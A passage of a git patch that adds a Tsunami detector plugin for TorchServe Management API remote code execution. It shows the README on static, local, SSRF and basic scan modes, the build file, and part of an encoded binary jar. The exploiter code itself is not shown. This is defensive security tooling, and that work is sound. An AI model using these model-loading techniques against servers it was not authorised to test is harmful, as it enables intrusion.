From 0376fac3853ceb102ff2d5c65776201542135ec0 Mon Sep 17 00:00:00 2001 
From: Savino Sisco
Date: Tue, 19 Dec 2023 12:07:45 +0100
Subject: [PATCH] TorchServe Management API RCE
---
 doyensec/detectors/rce/torchserve/README.md | 48 +
 .../detectors/rce/torchserve/build.gradle | 99 ++
 .../gradle/wrapper/gradle-wrapper.jar | Bin 0 -> 43462 bytes
 .../gradle/wrapper/gradle-wrapper.properties | 7 +
 doyensec/detectors/rce/torchserve/gradlew | 249 +++++
 doyensec/detectors/rce/torchserve/gradlew.bat | 92 ++
 .../detectors/rce/torchserve/settings.gradle | 1 +
 .../rce/torchserve/TorchServeExploiter.java | 900 ++++++++++++++++++
 ...hServeManagementAPIExploiterWebServer.java | 86 ++
 .../TorchServeManagementApiArgs.java | 62 ++
 .../TorchServeManagementApiConfig.java | 34 +
 .../TorchServeManagementApiDetector.java | 174 ++++
 ...eManagementApiDetectorBootstrapModule.java | 27 +
 .../rce/torchserve/TorchServeRandomUtils.java | 47 +
 .../resources/model/MAR-INF/MANIFEST.json | 12 +
 .../src/main/resources/model/model.py | 79 ++
 .../src/main/resources/model/serialized.pt | 0
 .../torchserve/MockTorchServeExploiter.java | 47 +
 ...hServeManagementApiExploiterWebServer.java | 52 +
 .../torchserve/MockTorchServeRandomUtils.java | 22 +
 .../torchserve/TorchServeExploiterTest.java | 195 ++++
 .../TorchServeExploiterTestWithCallback.java | 108 +++
 .../TorchServeManagementApiDetectorTest.java | 416 ++++++++
 .../TorchServeManagementApiTestBase.java | 101 ++
 ...nagementApiTestBaseWithCallbackServer.java | 72 ++
 25 files changed, 2930 insertions(+)
 create mode 100644 doyensec/detectors/rce/torchserve/README.md
 create mode 100644 doyensec/detectors/rce/torchserve/build.gradle
 create mode 100644 doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar
 create mode 100644 doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties
 create mode 100755 doyensec/detectors/rce/torchserve/gradlew
 create mode 100644 doyensec/detectors/rce/torchserve/gradlew.bat
 create mode 100644 doyensec/detectors/rce/torchserve/settings.gradle
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/model.py
 create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java
 create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java
diff --git a/doyensec/detectors/rce/torchserve/README.md b/doyensec/detectors/rce/torchserve/README.md
new file mode 100644
index 000000000..c048606f3
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/README.md
@@ -0,0 +1,48 @@
+# TorchServe Management API Detection Plugin
+## Overview
+This plugin detects and assesses the security risks of TorchServe Management API instances. Inspired by the ShellTorch vulnerability chain (disclosed by [Oligo Security](https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654)), it addresses the critical risks associated with insecure configurations of TorchServe, a widely used open-source application for serving PyTorch models in production.
+
+## Background
+TorchServe, before version 0.8.2, bound to `0.0.0.0` by default, potentially exposing its Management API to the internet. Since PyTorch models allow arbitrary code execution, unrestricted model addition poses significant risks including data leakage and user privacy breaches.
+
+The original ShellTorch attack exploited [CVE-2022-1471](https://nvd.nist.gov/vuln/detail/CVE-2022-1471), a vulnerability fixed in TorchServe 0.8.2. However, the risk of executing arbitrary code in models remains in the latest version (0.9.0).
+
+To mitigate these risks, TorchServe introduced the allow_urls feature, limiting model downloads to specified sources. However, a typical `allow_urls` configuration often includes entire services like GCP and AWS, which can be insecure. It's important to configure `allow_urls` carefully to avoid such vulnerabilities.
+
+## Plugin Description
+This plugin detects exposed TorchServe Management API instances, assessing the remote code execution (RCE) risk. It supports multiple detection modes:
+
+### Static Mode
+**Description:** Manually host a model file on a web server. Most reliable, particularly effective against lenient `allow_urls` configurations.
+**Use case:** Ideal when `allow_urls` includes cloud services, posing a security risk.
+
+```
+--torchserve-management-api-mode=static --torchserve-management-api-model-static-url=https://s3.amazonaws.com/model.mar
+```
+
+### Local Mode
+**Description:** Serve the model via an embedded web server. Quicker setup, but may fail against restrictive `allow_urls`.
+**Use case:** Best for environments where `allow_urls` is not a limiting factor.
+
+```
+--torchserve-management-api-mode=local --torchserve-management-api-local-bind-host=tsunami --torchserve-management-api-local-bind-port=1234 --torchserve-management-api-local-accessible-url=http://mydomain.com/
+```
+
+### SSRF Mode
+**Description:** Uses Tsunami's callback server as the model source. Indirect verification of RCE risk.
+**Use case:** Selected when direct model serving isn't feasible or as an additional verification layer.
+
+```
+--torchserve-management-api-mode=ssrf
+```
+
+### Basic Mode
+**Description:** Default mode that relies solely on Management API fingerprinting.
+**Use case:** Automatically selected when callback server isn't available, useful as a preliminary check.
+
+```
+--torchserve-management-api-mode=basic
+```
+
+## Testing
+Utilize the following testbed for assessing plugin functionality: [TorchServe Security Testbed](https://github.com/google/security-testbeds/tree/main/torchserve).
diff --git a/doyensec/detectors/rce/torchserve/build.gradle b/doyensec/detectors/rce/torchserve/build.gradle
new file mode 100644
index 000000000..c9704ecf2
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/build.gradle
@@ -0,0 +1,99 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami VulnDetector plugin for TorchServe CVE-2023-43654.'
+group = 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ javaxInjectVersion = '1'
+ jcommanderVersion = '1.48'
+ okhttpVersion = '3.12.0'
+
+
+ guavaVersion = '28.2-jre'
+ guiceVersion = '4.2.3'
+ tsunamiVersion = '0.0.14'
+ junitVersion = '4.13'
+ okhttpVersion = '3.12.0'
+ truthVersion = '1.0.1'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ implementation "javax.inject:javax.inject:${javaxInjectVersion}"
+ implementation "com.beust:jcommander:${jcommanderVersion}"
+ implementation "com.squareup.okhttp3:okhttp:${okhttpVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "com.google.guava:guava-testlib:${guavaVersion}"
+ testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+}
+
+// Generate model.zip file and include it in the jar file.
+task createModelsZip(type: Zip) {
+ from 'src/main/resources/model'
+ into '/'
+ destinationDirectory = file("$buildDir/resources/main")
+ archiveFileName = 'model.mar'
+}
+
+processResources.dependsOn createModelsZip
diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 0000000000000000000000000000000000000000..d64cd4917707c1f8861d8cb53dd15194d4248596 GIT binary patch literal 43462 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 